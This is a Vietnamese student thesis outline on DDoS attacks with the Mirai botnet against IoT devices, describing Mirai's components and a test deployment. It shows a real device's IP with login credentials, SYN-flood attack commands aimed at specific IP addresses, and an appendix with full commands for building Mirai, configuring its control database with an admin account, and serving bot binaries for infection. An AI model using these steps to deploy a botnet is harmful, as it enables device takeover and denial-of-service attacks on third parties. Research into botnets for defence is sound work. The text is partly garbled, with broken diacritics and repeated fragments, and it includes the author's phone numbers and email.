Mục tiêu của đồ án: Xây dựng hệ thống botnet, nghiên cứu cách thức hoạt động của hệ thống botnet, tìm hiểu một số kỹ thuật coding thú vị trong mã nguồn, lây nhiễm mã độc lên thiết bị thật và thực nghiệm tấn công DDoS, nghiên cứu phát triển những hạn chế của mã nguồn. Mời các bạn cùng tham khảo.
BAN CƠ YẾU CHÍNH PHỦ HỌC VIỆN KỸ THUẬT MẬT MÃ ˉˉˉˉˉˉˉˉˉˉˉˉˉˉˉˉ ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU TẤN CƠNG DDOS VỚI BOTNET MIRAI TRÊN CÁC THIẾT BỊ INTERNET OF THINGS ( IoT ) Ngành: Cơng nghệ thơng tin Chun ngành: An tồn thơng tin Mã số: 52.48.02.01 Hà Nội, 2017 BAN CƠ YẾU CHÍNH PHỦ HỌC VIỆN KỸ THUẬT MẬT MÃ ˉˉˉˉˉˉˉˉˉˉˉˉˉˉˉˉ ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU TẤN CƠNG DDOS VỚI BOTNET MIRAI TRÊN CÁC THIẾT BỊ INTERNET OF THINGS ( IoT ) Ngành: Cơng nghệ thơng tin Chun ngành: An tồn thơng tin Mã số: 52.48.02.01 Sinh viên thực hiện: Nguyễn Thế Đạt Lớp: AT9A Người hướng dẫn : KS. Nguyễn Mạnh Thắng Khoa An tồn thơng tin – Học viện Kỹ thuật mật mã Mọi đóng góp trao đổi liên hệ: SĐT: 01699960595 hoặc 0949423894. Mail: datnt2308@gmail.com Hà Nội, 2017 MỤC LỤC Danh mục kí hiệu và viết tắt 5 Danh mục hình vẽ 6 Danh mục bảng 8 Lời nói đầu 9 Chương 1. Tổng quan về internet of things 11 1.1. Lịch sử hình thành và phát triển Internet 11 1.2. Giới thiệt về Internet of Things 12 Chương 2. Tổng quan về tấn công từ chối dịch vụ ddos 16 2.1. Tổng quan về an ninh mạng 16 2.2. Tổng quan về tấn công từ chối dịch vụ 16 Chương 3. Nghiên cứu về mã nguồn botnet mirai 19 3.1. Giới thiệu về Botnet Mirai 19 3.2. Phân tích các thành phần của Botnet Mirai 22 Chương 4. Triển khai thực nghiệm botnet mirai trÊn cÁc thiết bị iot 37 4.1. Mô tả thực nghiệm 37 4.2. Thử nghiệm tấn công 37 Kết luận 51 Tài liệu tham khảo 52 Phụ lục 53 DANH MỤC KÍ HIỆU VÀ VIẾT TẮT || Hoặc & Và Admin Administrator ARPANET Advanced Research Projects Agency Network CNC Command And Control DDoS Distributed Denial of Service IP Internet Protocol IoT Internet of Things LAN Local Area Metwork NII National Information Infrastructure NSF National Science Foundation MILNET Military Network TCP/IP Transmission Control Protocol/Internet Protocol DANH MỤC HÌNH VẼ Hình 1.1. Xu hướng phát triển IoT 12 Hình 3.2. Mirai sử dụng 5 useragent khác nhau (mirai/bot/table.h) .20 Hình 3.3. Mirai sử dụng 10 kỹ thuật tấn công từ chối dịch vụ (mirai/bot/attack.h) .20 Hình 3.4. Mơ hình hoạt động logic của các thành phần 21 Hình 3.5. Cấu trúc thư mục mã nguồn .21 Hình 3.6. CNC lắng nghe kết nối (mirai/cnc/main.go) 23 Hình 3.7 CNC nhận thông tin bot admin (mirai/cnc/main.go) .24 Hình 3.8. Nhập username từ cmd .24 Hình 3.9. Nhập password từ cmd 24 Hình 3.10. Nhập password từ cmd 25 Hình 3.11. Thơng báo đăng nhập thành cơng 25 Hình 3.12. Kiểm tra số lượng Bot connect tới CNC 25 Hình 3.13. Thêm và cấu hình cho tài khoản mới 26 Hình 3.14. Hàm AttackInfoLookup .27 Hình 3.15. Thiết lập network card cho report server (loader/main.c) .27 Hình 3.16. Khởi tạo server chứa mã độc (loader/main.c) .28 Hình 3.17. Nhận ip, port, user, pass từ STDIN (loader/main.c) 28 Hình 3.18. Sử dụng busybox login và lây mã độc (loader/server.c) 31 Hình 3.19. Lắng nghe kết nối trên cổng 48101 (scanListen.go) .31 Hình 3.20 Hiển thị thông tin thiết bị bruteforce được (scanListen.go) .32 Hình 3.21. Che dấu tiến trình (mirai/bot/main.c) .33 Hình 3.22. Các phương thức tấn cơng (mirai/bot/attack.c) .34 Hình 3.23. Kill các cổng dịch vụ (mirai/bot/killer.c) 34 Hình 3.24. Ngăn cản thiết bị reboot lại (mirai/bot/main.c) .35 Hình 3.25 Tài khoản dùng để bruteforce IoT (mirai/bot/scanner.c) .35 Hình 3.26. Địa chỉ bruteforce thiết bị IoT mới (mirai/bot/scanner.c) .35 Hình 3.27 Bot gửi thông tin IoT bruteforce (mirai/bot/scanner.c) .36 Hình 3.28. Khai báo domain và port các server (mirai/bot/table.c) 36 Hình 4.29. Khởi chạy CNC Server .38 Hình 4.30. Cài đặt thơng tin của Database (cnc\main.c) 39 Hình 4.31. CNC đăng nhập Database (cnc\database.go) 39 Hình 4.32. Khởi chạy scanListen 39 Hình 4.33. Mở port 48101 chờ kết quả từ Bot 40 Hình 4.34. Nhập Bot cho Loader 40 Hình 4.35. Loader kết nối thiết bị IoT lây nhiễm Malware 41 Hình 4.36. Loader thực hiện lây lan Malware 41 Hình 4.37. Attacker telnet tới CNC .42 Hình 4.38. Attacker đăng nhập CNC 43 Hình 4.39 Kiểm tra kết nối tới cổng 23 Bot hay Admin (cnc/main.go) 44 Hình 4.40. Loader hiển thị Bot kết nối thành cơng 45 Hình 4.41. Thơng tin Bot scan thiết bị khác 46 Hình 4.42. Thơng tin thiết bị mà Bot bruteforce thành cơng 47 Hình 4.43. Nhập lệnh tấn cơng 47 Hình 4.44. Lệnh hacker dùng tấn cơng 48 Hình 4.45. Thiết bị IoT là IP Camera bị chiếm quyền kiểm sốt 50 Hình 4.46. Victim bị Attacker tấn cơng khiến lưu lượng tăng cao 50 DANH MỤC BẢNG Bảng 1. Thành phần thực nghiệm .37 LỜI NĨI ĐẦU Internet of Things là cụm từ nhằm để chỉ các đối tượng có thể được nhận biết cũng như sự tồn tại của chúng và được Kenvin Ashton đưa ra năm 1999. Cho đến nay, mạng lưới vạn vật kết nối Internet là một kịch bản của thế giới hiện đại khi mà mỗi đồ vật, con người được cung cấp một định danh riêng và tất cả đều có khả năng truyền tải, trao đổi thơng tin qua mạng mà khơng cần tương tác trực tiếp giữa người với người hay người với máy tính. Tóm lại, IoT là một tập hợp các thiết bị có khả năng kết nối với nhau, với Internet và với thế giới bên ngồi để thực hiện một cơng việc nào đó Trong bối cảnh IoT bùng nổ như là một xu hướng mới trong tương lai đi kèm với những tiện ích thì cũng tiềm ẩn những mối nguy hại và trở thành mục tiêu hàng đầu của giới Hacker hiện đại. IoT có thể gây ảnh hưởng xấu nếu các thiết bị bảo mật kém có thể bị nhiễm mã độc và trở thành một zombie trong mạng botnet. Khi hacker điều khiển một lượng lớn thiết bị IoT sẽ dễ dàng tấn cơng DDoS đánh sập bất cứ thứ gì trên Internet với lượng dữ liệu khổng lồ Cuối năm 2016, mã nguồn Mirai đã được cơng bố gây ra ảnh hướng lớn kèm theo vơ vàn mối lo và cũng là lời cảnh báo với các sản phẩm IoT trong tương lai. Vì vậy đề tài được chọn khi thực hiện đồ án tốt nghiệp này là "Nghiên cứu tấn cơng DDoS với botnet Mirai trên các thiết bị Internet of Things (IoT)" Đồ án được thực hiện nhằm mục đích nghiên cứu cách thức hoạt động và mối nguy hiểm của mã nguồn botnet Mirai trên thiết bị IoT để từ đó đưa ra các giải pháp phòng chống Mục tiêu đặt ra khi thực hiện đồ án là: Xây dựng hệ thống botnet Nghiên cứu cách thức hoạt động của hệ thống botnet Tìm hiểu một số kỹ thuật coding thú vị trong mã nguồn Lây nhiễm mã độc lên thiết bị thật và thực nghiệm tấn cơng DDoS. Nghiên cứu phát triển những hạn chế của mã nguồn Sau thời gian khoảng bốn tháng thực hiện đồ án, các mục tiêu về cơ bản đã đạt được. Tuy nhiên tấn cơng DDoS IoT là lĩnh vực khoa học phức tạp, thời gian thực hiện đồ án tương đối ngắn nên chắc chắn khơng tránh khỏi thiếu sót. Rất mong được sự góp ý của các thầy cơ, cũng như các bạn học viên để đồ án này được hồn thiện hơn 10 Hình 4.40. Loader hiển thị Bot kết nối thành cơng Như vậy Bot có IP 61.222.7.176, port 23, tài khoản admin/1111, kiến trúc arm7 Và đặc biệt Bot có tiện ích Busybox và có thể sử dụng lệnh Wget. Wget như đã nói từ trước giúp thiết bị tải Malware từ Wget Server Bot: 45 Hình 4.41. Thơng tin Bot scan thiết bị khác Ngay sau khi lây nhiễm Malware vào thiết bị thì Bot sẽ: Tự kill các tiến trình đang mở port 23 trên Bot nhằm khơng cho bất kỳ ai có thể truy cập vào thiết bị qua port 23 Phân giải tên miền CNC Kết nối tới CNC Tự động bruteforce thiết bị khác và đồng thời giữ kết nối với CNC Gửi kết quả cho Report Server Report Server: 46 Hình 4.42. Thơng tin thiết bị mà Bot bruteforce thành cơng Hiển thị thơng tin về thiết bị mà Bot bruteforce thành cơng Lưu ý: trong Source code Mirai, Bot chỉ dừng mức bruteforce mà chưa kiểm tra các điều kiện để lây Malware trên thiết bị nên việc này hồn tồn khơng có nghĩa thiết bị phù hợp để lây Bot. Loader server mới là nơi kiểm tra điều kiện và lây Malware chứ khơng phải scanListen. Cần phân biệt điều này, đây mới chỉ là điều kiện cần nhưng chưa đủ Bước 6. Attacker tấn cơng Victim Bước 6 có 3 nhiệm vụ: Hiển thị thơng tin về user đăng nhập và số lượng Bot có thể attack Nhập lệnh attack Gửi lệnh tới CNC Nhập lệnh tấn cơng theo định dạng : [Flags] Ví dụ: syn 203.162.130.66 30 psh==1 syn 203.162.130.66 3600 ack==1 Hình 4.43. Nhập lệnh tấn cơng 47 Lệnh sẽ được Attacker gửi sẽ được gửi như sau: Attacker nhập lệnh tấn cơng qua CMD > CNC > Bot > Victim Hình 4.44. Lệnh hacker dùng tấn cơng IP Attacker: 14.177.140.96 IP CNC: 203.162.130.69 IP Victim: 203.162.130.87 Command: syn 203.162.130.87 20 psh==1 Attacker tấn cơng Victim bằng Syn Flood và có cả Flag Push trong vòng 20s 48 Bước 7. Kiểm tra kết quả 49 Hình 4.45. Thiết bị IoT là IP Camera bị chiếm quyền kiểm sốt Hình 4.46. Victim bị Attacker tấn cơng khiến lưu lượng tăng cao Bot liên tục gửi gói tin tấn cơng Victim trong vòng 20s. Tuy nhiên, số lượng gói tin Victim phải hứng chịu rất lớn 50 KẾT LUẬN Bốn chương của đồ án đã thể hiện được rằng những mục tiêu đặt ra khi thực hiện đồ án đều đã đạt được. Cụ thể: Chương 1 đã giới thiệu được tổng quan về Internet of Things. Chương này cũng đã chỉ ra rằng với xu hướng và những ứng dụng thực tiễn của IoT ln tồn tại những mối nguy hiểm tiềm ẩn. Trong đó, mối nguy hiểm lớn và đang hot nhất là Botnet IoT Chương 2 nối tiếp chương một nói cụ thể hơn về sự nguy hiểm của tấn cơng từ chối dịch vụ và xu hướng sử dụng Botnet IoT vào tấn cơng DDoS đang là kim chỉ nam cho các cuộc tấn cơng mạng mà hacker đương đại đang nhắm đến Chương 3 lần lượt xem xét các thành phần và cấu trúc của mã nguồn Mirai Đồng thời cụ thể hóa các kỹ thuật và ý tưởng xây dựng Botnet Mirai của tác giả thơng qua sự phân tích các đoạn mã. Theo đó, sự phân tích đã chỉ ra những nhược điểm còn thiếu sót trong mã nguồn. Những nhược điểm được lộ rõ đã được em triển khai khắc phục Trong chương 4, thực nghiệm đã mơ tả q trình xây dựng thực tế trên hệ thống và những thiết bị thật. Mơ hình triển khai đã cụ thể hóa các thành phần mã nguồn, cách chúng kết hợp và tương tác. Từ đó, ai cũng có thể hiểu rõ hơn về hệ thống Botnet Mirai nói riêng và hệ thống Botnet trên thế giới nói chung Dù vậy, vẫn còn một số vấn đề liên quan. Trước hết, đồ án này mới chỉ đề cập đến việc sử dụng bruteforce mà chưa đi sâu vào việc ứng dụng lỗ hổng zero day, CVE đã được cơng bố để khai thác thiết bị IoT do chưa đủ thời gian để nghiên cứu thêm. Mã nguồn của tác giả có một số thiếu sót trong việc biên dịch sang x86 dẫn đến lỗi khi chạy trên nền tảng này. Dù em đã cố gắng chỉnh sửa và biên dịch lại nhưng chưa thành cơng. Việc giải quyết những điểm tồn tại này cũng chính là hướng phát triển tương lai của đồ án 51 TÀI LIỆU THAM KHẢO [1] GSM Accociation, IoT Security Guidelines Overview Document Version 1.1, November 07, 2016 [2] Mirai DDoS Botnet: Source Code & Binary Analysis, http://www.simonroses.com/2016/10/miraiddosbotnetsourcecodebinary analysis/ [3] Octave Klaba, This botnet with 145607 cameras/dvr (130Mbps per IP) is able to send >1.5Tbps DDoS. Type: tcp/ack, tcp/ack+psh, tcp/syn.“ [4] Brian Krebs; Krebs on Security, 1.10.2016: „Source Code for IoT Botnet ‘Mirai’ Released“: https://krebsonsecurity.com/2016/10/sourcecodeforiot botnetmiraireleased/ [5] Word’s Largest Net: Mirai Botnet, https://hackforums.net/showthread.php? tid=5420472 52 PHỤ LỤC Các bước cài đặt hệ thống Botnet Mirai: #Update Sources.list in /etc/apt/sources.list deb http://http.kali.org/kali kalirolling main contrib nonfree debsrc http://http.kali.org/kali kalirolling main contrib nonfree deb http://old.kali.org/kali sana main nonfree contrib debsrc http://old.kali.org/kali sana main nonfree contrib #Update Repo aptget update #Requirements aptget install gcc golang electricfence mysqlserver mysqlclient #Git Clone Mirai Source Code cd /home/mirai mkdir ddos/ cd ddos/ aptget install git git clone https://github.com/jgamblin/MiraiSourceCode.git cd MiraiSourceCode/mirai export PATH=$PATH:/usr/local/go/bin export GOPATH=/home/mirai/go go get github.com/gosqldriver/mysql go get github.com/mattn/goshellwords mkdir /etc/xcompile cd /etc/xcompile wget https://www.uclibc.org/downloads/binaries/0.9.30.1/crosscompiler armv4l.tar.bz2 wget http://distro.ibiblio.org/slitaz/sources/packages/c/crosscompiler armv5l.tar.bz2 53 wget http://distro.ibiblio.org/slitaz/sources/packages/c/crosscompiler armv6l.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/crosscompiler i586.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/crosscompiler m68k.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/crosscompiler mips.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/crosscompiler mipsel.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/crosscompiler powerpc.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/crosscompiler sh4.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/crosscompiler sparc.tar.bz2 tar jxf crosscompilerarmv4l.tar.bz2 tar jxf crosscompilerarmv5l.tar.bz2 tar jxf crosscompilerarmv6l.tar.bz2 tar jxf crosscompileri586.tar.bz2 tar jxf crosscompilerm68k.tar.bz2 tar jxf crosscompilermips.tar.bz2 tar jxf crosscompilermipsel.tar.bz2 tar jxf crosscompilerpowerpc.tar.bz2 tar jxf crosscompilersh4.tar.bz2 tar jxf crosscompilersparc.tar.bz2 rm *.tar.bz2 mv crosscompilerarmv4l armv4l mv crosscompilerarmv5l armv5l mv crosscompilerarmv6l armv6l mv crosscompileri586 i586 54 mv crosscompilerm68k m68k mv crosscompilermips mips mv crosscompilermipsel mipsel mv crosscompilerpowerpc powerpc mv crosscompilersh4 sh4 mv crosscompilersparc sparc # PUT THESE COMMANDS IN THE FILE ~/.bashrc # Cross compiler toolchains export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin # Golang export PATH=$PATH:/usr/local/go/bin export GOPATH=/home/mirai/go cd /home/mirai/ddos/MiraiSourceCode/mirai /build.sh debug telnet /build.sh debug telnet /debug/enc string edit file bot/table.c vi bot/table.c service mysql start 55 mysql u root CREATE DATABASE mirai; use mirai; CREATE TABLE `history` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `user_id` int(10) unsigned NOT NULL, `time_sent` int(10) unsigned NOT NULL, `duration` int(10) unsigned NOT NULL, `command` text NOT NULL, `max_bots` int(11) DEFAULT '1', PRIMARY KEY (`id`), KEY `user_id` (`user_id`) ); CREATE TABLE `users` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `username` varchar(32) NOT NULL, `password` varchar(32) NOT NULL, `duration_limit` int(10) unsigned DEFAULT NULL, `cooldown` int(10) unsigned NOT NULL, `wrc` int(10) unsigned DEFAULT NULL, `last_paid` int(10) unsigned NOT NULL, `max_bots` int(11) DEFAULT '1', `admin` int(10) unsigned DEFAULT '0', `intvl` int(10) unsigned DEFAULT '30', `api_key` text, PRIMARY KEY (`id`), KEY `username` (`username`) ); CREATE TABLE `whitelist` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `prefix` varchar(16) DEFAULT NULL, `netmask` tinyint(3) unsigned DEFAULT NULL, PRIMARY KEY (`id`), 56 KEY `prefix` (`prefix`) ); exit mysqladmin u root password root mysql u root p //dang nhap password mysql : root GRANT ALL ON mirai.* TO 'root'@'127.0.0.1'; GRANT ALL ON mirai.* TO 'root'@'localhost'; use mirai; INSERT INTO users VALUES (NULL, 'hacker', 'hacker', 0, 0, 0, 0, 1, 1, 30, ''); exit cd cnc/ leafpad main.go password database : root port 3306 cd copy file prom.pt vao cnc export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin # Golang export PATH=$PATH:/usr/local/go/bin export GOPATH=/home/mirai/go go get github.com/gosqldriver/mysql 57 go get github.com/mattn/goshellwords /build.sh debug telnet /build.sh release telnet #dlr cd /home/mirai/ddos/MiraiSourceCode/dlr edit main.c => IP HTTP Server comment ./build.sh: line 3: i686gcc: command not found /build.sh: line 16: i686strip: command not found #DLR build # aptget update && aptget upgrade aptget install buildessential Replace i686gcc with gcc, i686strip with strip and try again /build.sh copy dlr vao bin cua loader chmod 777 build.sh export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin /build.sh cd release/ cp * / /loader/bins/ cd / /loader/src/ 58 leafpad main.c #edit tftp,wget,bind address cd /build.debug.sh /build.sh mkdir /var/www/html/bins cd /home/mirai/ddos/MiraiSourceCode/mirai/ cp R release/mirai.* /var/www/html/bins cp R release/miraint.* /var/www/html/bins cp prompt.txt release/ cd release/ /cnc 59 ... lai. Vì vậy đề tài được chọn khi thực hiện đồ án tốt nghiệp này là "Nghiên cứu tấn cơng DDoS với botnet Mirai trên các thiết bị Internet of Things (IoT) " Đồ án được thực hiện nhằm mục đích nghiên cứu cách thức hoạt động và ... HỌC VIỆN KỸ THUẬT MẬT MÃ ˉˉˉˉˉˉˉˉˉˉˉˉˉˉˉˉ ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU TẤN CƠNG DDOS VỚI BOTNET MIRAI TRÊN CÁC THIẾT BỊ INTERNET OF THINGS ( IoT ) Ngành: Cơng nghệ thơng tin Chun ngành: An tồn thơng tin... điều khiển các máy tính mà hướng đến các thiết bị IoT (Internet of Things) Mirai thực hiện rà qt dải mạng IPv4 nhằm tìm kiếm các thiết bị IoT. Để tối ưu hóa hiệu năng rà qt của mình thì Mirai thực hiện loại bỏ các dải IP như